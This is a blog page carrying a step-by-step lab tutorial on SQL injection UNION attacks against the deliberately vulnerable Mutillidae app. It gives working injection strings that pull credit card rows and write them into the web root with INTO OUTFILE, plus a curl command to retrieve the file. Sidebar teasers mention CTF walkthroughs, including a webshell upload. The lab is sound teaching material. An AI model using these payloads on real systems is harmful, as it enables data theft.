Chuyển đến nội dung chính

Bài Hướng Dẫn Mutillidae : Lesson 9 SQL Injection Union Exploit #2 (Create Output File)

{ SQL Injection Union Exploit #2 (Create Output File) }
Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)
  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
    3. Mutillidae: Lesson 8: SQL Injection Union Exploit #1
      • Note: This lab contains a detailed foundation surrounding the union exploit.
  • Lab Notes
    • In this lab we will do the following:
      1. Due to a purposely bug in the user-info.php code, we will use a Union SQL Injection to obtain nowasp application pretend credit card information.
      2. We will use a Union SQL Injection to redirect the output into a viewable text file on the Mutillidae web server.
  • Legal Disclaimer - bài hướng dẫn dùng trong môi trường học tập
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

Section 2. Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine
  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

Section 4. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

Section 5. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 6. Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

Section 7. Database Union Explanation
  1. On Fedora 14 - Mutillidae
    • Notes (FYI):
      • Use your existing Terminal you opened in (Section 3, Step 1).
    • Instructions:
      1. su - root
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;
  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables, list all the tables in the particular DATABASE.
  3. Show Tables
    • Instructions:
      1. desc accounts;
      2. desc credit_cards;
    • Notes (FYI):
      1. desc accounts, show the accounts TABLE fields.
      2. desc credit_cards, show the credit_cards TABLE fields.
  4. Table Union
    • Instructions:
      1. select * from accounts where username RLIKE '^[0-9]' union select ccid, ccnumber, ccv, expiration, null from credit_cards;
    • Notes (FYI):
      1. UNION is used to combine the result from multiple SELECT statements into a single result set.
      2. The UNION operator is ALSO used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of fields of other tables.
      3. RLIKE is MySQL regular expression operator, which I am filtering the username column that only starts with a number.
  5. Write to Output Files
    • Instructions:
      1. select * from accounts where username RLIKE '^[0-9]' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO OUTFILE '/tmp/CCN.csv' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED by '\n';
    • Notes (FYI):
      1. We add the above highlighted clause to demonstrate how a person could write their results to an output file.
      2. This illustration is a prelude into various web vulnerabilities that we will further demonstrate.
  6. View Output Files
    • Instructions:
      1. \! cat /tmp/CCN.csv
    • Notes (FYI):
      1. To run a Linux system call from a "mysql>" prompt you can use the "\!" characters in front of the command you want to issue.
      2. In this case, we will cat or display the file we just created with mysql.

Section 8. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 9. Go To User Info Page
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info
Section 15. SQL Injection (Refresher Union Examples)
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. Second Union SQL Injection Attempt
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select ccid,ccnumber,ccv,expiration,null from credit_cards --
      2. Click the View Account Details button
    • Note(FYI):
      1. The goal with this union statement is to map out which fields in the database align with the above numbers when the output is displayed.
  4. Viewing the Results
    • Note(FYI):
      1. Scroll down and notice that Username is populated with a credit card number, Password is populated with the CCV, and Signature is populated with the expiration.
        • Username=4444111122223333
        • Password=745
        • Signature=2012-03-01
      2. Congrats, you successful manipulated a "purposeful" bug in the user-info.php script, to display credit card information using a query meant for the accounts table.
    • Instructions:
      1. View the Results

Section 16. SQL Injection (Union Example with Curl #5)
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info
  2. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  3. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  4. Execute MySQL Union Injection
    • Note(FYI):
      1. Remember to put a space after the "-- ".
    • Instructions:
      1. Place the below Injection String in the Name Textbox
        • ' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO OUTFILE '/var/www/html/mutillidae/CCN.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' --
      2. Click the View Account Details Button
  5. View Results Page
    • Instructions:
      1. At first you would think that causing an Authentication Error would not result in any other action aside from printing a message to the screen.
      2. Although the second message says results were found, they were actually written to a file instead of being displayed to the screen.
      3. Open a new tab
  6. View Union Injection Output File
    • Notes(FYI):
      1. Replace 192.168.1.111 in the below URL with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Textbox
        • http://192.168.1.111/mutillidae/CCN.txt

Section 17. Proof of Lab
  1. Proof of Lab, (On a BackTrack Terminal)
    • Notes(FYI):
      1. Replace 192.168.1.111 in the below URL with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. curl --location "http://192.168.1.111/mutillidae/CCN.txt"
      2. date
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to website Www.AnToanThongTin.Edu.Vn
Nhãn:

Bài đăng phổ biến từ blog này

Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start. First of all download lab from https://download.vulnhub.com/gibson/gibson.ova Now open kali terminal and like always start with first step i.e. netdiscover netdiscover it shows all the hosts those are up in our network and from here we get our target ip. Target IP: 192.168.1.6 As our target is all set we are going to scan it with nmap which will show all the open ports. In this case open ports are only two i.e. 22 and 80. nmap –p- -A 192.168.1.6 As from the above result we have got 80 port open so we will open target ip in browser. It shows an accessible directory. Let’s try opening it as we cannot see anything important here. Oh no such luck with this also. It’s written the result will be found by brute force but there is no place where we can apply brute force. As we do not have any other option so let’s just go to view page source to see if we could get a...
Đọc thêm

Penetration Testing in PwnLab (CTF Challenge)

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access. Download From Here Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP’s present in our network, so go to the terminal of you Kali and type : netdiscover Target IP = 192.168.0.105 And to know that we start our penetration testing. So, first, we will now scan with nmap , we will apply an aggressive scan as it gives detailed information and is fast. The command is : nmap -A 192.168.0.105 We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306. Our target IP is 192.168.0.105 as its MAC Vendor is...
Đọc thêm

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of previous lab, download it from  here . Now install the iso image in VM ware and start it. In this lab task level is intermediate and challenge is to gain access of administration console and then upload a PHP webshell. Start Kali Linux then open the terminal and  type netdiscover  command for scanning network. Here  192.168.1.102  is my target IP which is shown in the screenshot. Now explore this IP in browser. When you will open target IP in browser you will get a web page having heading My Awesome Photoblog . On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now  Click  on  test . The given URL : http://192.168.1.102/cat.php?id=1  will run sql query for  ID 1  now let try to find out whether the above URL is vulnerable to sql injection or not by adding( ‘) apostrophe at last of URL: http://192.168.1.102/cat.p...
Đọc thêm